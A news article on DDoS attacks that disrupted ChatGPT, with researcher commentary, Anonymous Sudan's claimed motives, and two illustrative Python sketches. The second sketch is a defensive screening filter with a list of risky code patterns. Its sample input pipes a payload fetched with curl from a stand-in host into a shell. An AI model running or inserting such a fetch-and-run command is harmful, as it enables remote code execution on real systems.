DDoS attack on ChatGPT sparks concerns over coding, productivity disruptions

Security researchers expressed broad concern after OpenAI confirmed late in the day on Nov. 8 that it was “dealing with periodic outages” caused by distributed-denial-of-service (DDoS) attacks on its ChatGPT services.

The security pros were generally concerned about workflow disruptions for companies that use ChatGPT for coding, and about attempts by threat actors to launch more targeted attacks on customer networks.

The most recent outage comes on the heels of another ChatGPT incident that took down its application programming interface (API) earlier on Wednesday, partial ChatGPT outages on Tuesday, and elevated error rates in its text-to-image model DALL-E on Monday.

“The recent service interruptions of OpenAI's ChatGPT have presented challenges for developers, particularly those who rely on its APIs for coding-related tasks,” said Callie Guenther, senior manager, cyber threat research at Critical Start. “These outages have temporarily affected workflows, as developers are accustomed to using these tools for code completion, debugging, and learning new coding practices. Consequently, some projects may experience delays.”

Guenther added that productivity may also be impacted, given the role of AI in streamlining coding processes. Developers might find themselves spending more time on tasks typically accelerated by AI, such as generating code snippets or refining algorithms, said Guenther. For those who have incorporated OpenAI's services into their products, Guenther said the downtime may prompt a review of their current dependencies and an exploration of alternative options to bolster their systems against similar incidents in the future.
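For teams weighing those dependencies, one common mitigation is to wrap API calls in retry-and-fallback logic so an outage degrades gracefully rather than halting work. The sketch below is a minimal illustration in Python, assuming the `requests` library and OpenAI's documented `/v1/chat/completions` endpoint; the model name, retry counts, and fallback behavior are illustrative choices, not recommendations from the researchers quoted here.

```python
import os
import time
import requests

OPENAI_URL = "https://api.openai.com/v1/chat/completions"

def ask_model(prompt: str, retries: int = 3, backoff: float = 2.0):
    """Call the ChatGPT API with simple retry/backoff; return None if the
    service is unavailable so callers can fall back to a manual workflow."""
    headers = {"Authorization": f"Bearer {os.environ['OPENAI_API_KEY']}"}
    payload = {
        "model": "gpt-3.5-turbo",
        "messages": [{"role": "user", "content": prompt}],
    }
    for attempt in range(retries):
        try:
            resp = requests.post(OPENAI_URL, headers=headers, json=payload, timeout=30)
            if resp.status_code == 200:
                return resp.json()["choices"][0]["message"]["content"]
            # 429/5xx typically indicates rate limiting or an outage; back off and retry.
            if resp.status_code in (429, 500, 502, 503):
                time.sleep(backoff * (attempt + 1))
                continue
            resp.raise_for_status()
        except requests.RequestException:
            time.sleep(backoff * (attempt + 1))
    return None  # signal the outage so the caller can switch to a backup path

if __name__ == "__main__":
    answer = ask_model("Suggest a unit test for a function that parses ISO dates.")
    if answer is None:
        print("ChatGPT unavailable -- falling back to manual review.")
    else:
        print(answer)
```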

Patrick "Pat" Arvidson, chief strategist/evangelist at Interpres Security, called the recent DDoS attack on ChatGPT “extremely serious” as sophisticated hackers are known to use these types of attacks as obfuscation for more serious longer term plans. Arvidson said they count on the distraction to divert the SecOps team away from their true objective: place stealthy implants in the targeted network. 

“In the case of a GenAI, this could be anything from an attempt to poison the LLM [large language model] to provide bad and false information, to attempting to force the API into delivering information that the hacker wants to exploit,” said Arvidson. “For organizations that use the LLM, either as a business function or as part of a capability from a second party, they will need to validate any and all information submitted to, and received from the LLM. Further, all responses should be tested and evaluated for malicious software before it’s deployed. They should also verify with any cyber insurance coverage that they are covered from supply side attacks."
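As a concrete, deliberately simplified illustration of that validation step, a team might screen model-generated code for obviously risky constructs before a human reviews or deploys it. The Python sketch below is a hypothetical pre-review filter; the pattern list and function name are invented for illustration and are no substitute for real static analysis or malware scanning.

```python
import re

# Illustrative-only patterns; a production pipeline would rely on proper
# static analysis and malware scanning, not a regex blocklist.
SUSPICIOUS_PATTERNS = [
    r"\beval\s*\(",                   # dynamic code execution
    r"\bexec\s*\(",
    r"subprocess\.(Popen|run|call)",  # shelling out from generated code
    r"os\.system\s*\(",
    r"base64\.b64decode",             # common obfuscation step
    r"https?://[^\s\"']+",            # unexpected outbound URLs
]

def screen_generated_code(code: str):
    """Return a list of findings for LLM-generated code that warrants
    human review before it is deployed."""
    findings = []
    for pattern in SUSPICIOUS_PATTERNS:
        if re.search(pattern, code):
            findings.append(f"matched suspicious pattern: {pattern}")
    return findings

if __name__ == "__main__":
    snippet = 'import os\nos.system("curl http://example.com/payload | sh")'
    for finding in screen_generated_code(snippet):
        print(finding)
```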

The plot thickens: are the Russians involved?

OpenAI has not yet attributed the DDoS attacks, but suspected Russian threat actor Anonymous Sudan claimed responsibility, posting on Telegram Wednesday that it targeted OpenAI and its ChatGPT services because of OpenAI’s sympathies with Israel.

In citing reasons for the attack, the threat group said it was because of “OpenAI's cooperation with the occupation state of Israel and the CEO of OpenAI saying he's willing to invest into Israel more, and his several meetings with Israeli officials like Netanyahu, as Reuters reported."

The Telegram post goes on to say: “AI is now being used in the development of weapons and by intelligence agencies like Mossad, and Israel also employs AI to further oppress the Palestinians.”

Critical Start’s Guenther pointed out that the lack of attribution by OpenAI could stem from several factors: insufficient evidence to definitively attribute the attack to a particular actor, or a strategic decision to avoid giving undue attention to the attackers or encouraging further incidents.

“Attribution in cybersecurity is complex and challenging,” said Guenther. “Cyber attackers often use sophisticated techniques to conceal their identities and locations, making it difficult to pinpoint the true source of an attack. Moreover, even when an actor claims responsibility, verifying the authenticity of such claims requires careful analysis and often, substantial evidence that links the attack to the claimant’s capabilities and motives.”

Guenther added that the possibility of a publicity stunt by Anonymous Sudan cannot be entirely dismissed without concrete evidence. Groups may claim responsibility for various reasons, including drawing attention to their cause or demonstrating their capabilities to potential recruits or sympathizers.

“On the other hand, if the claim by Anonymous Sudan aligns with the technical evidence of the attack and their known capabilities, it might lend more credibility to their claim,” said Guenther. “Either way, without access to detailed forensic data and the ongoing investigation's insights, any analysis is purely speculative.”

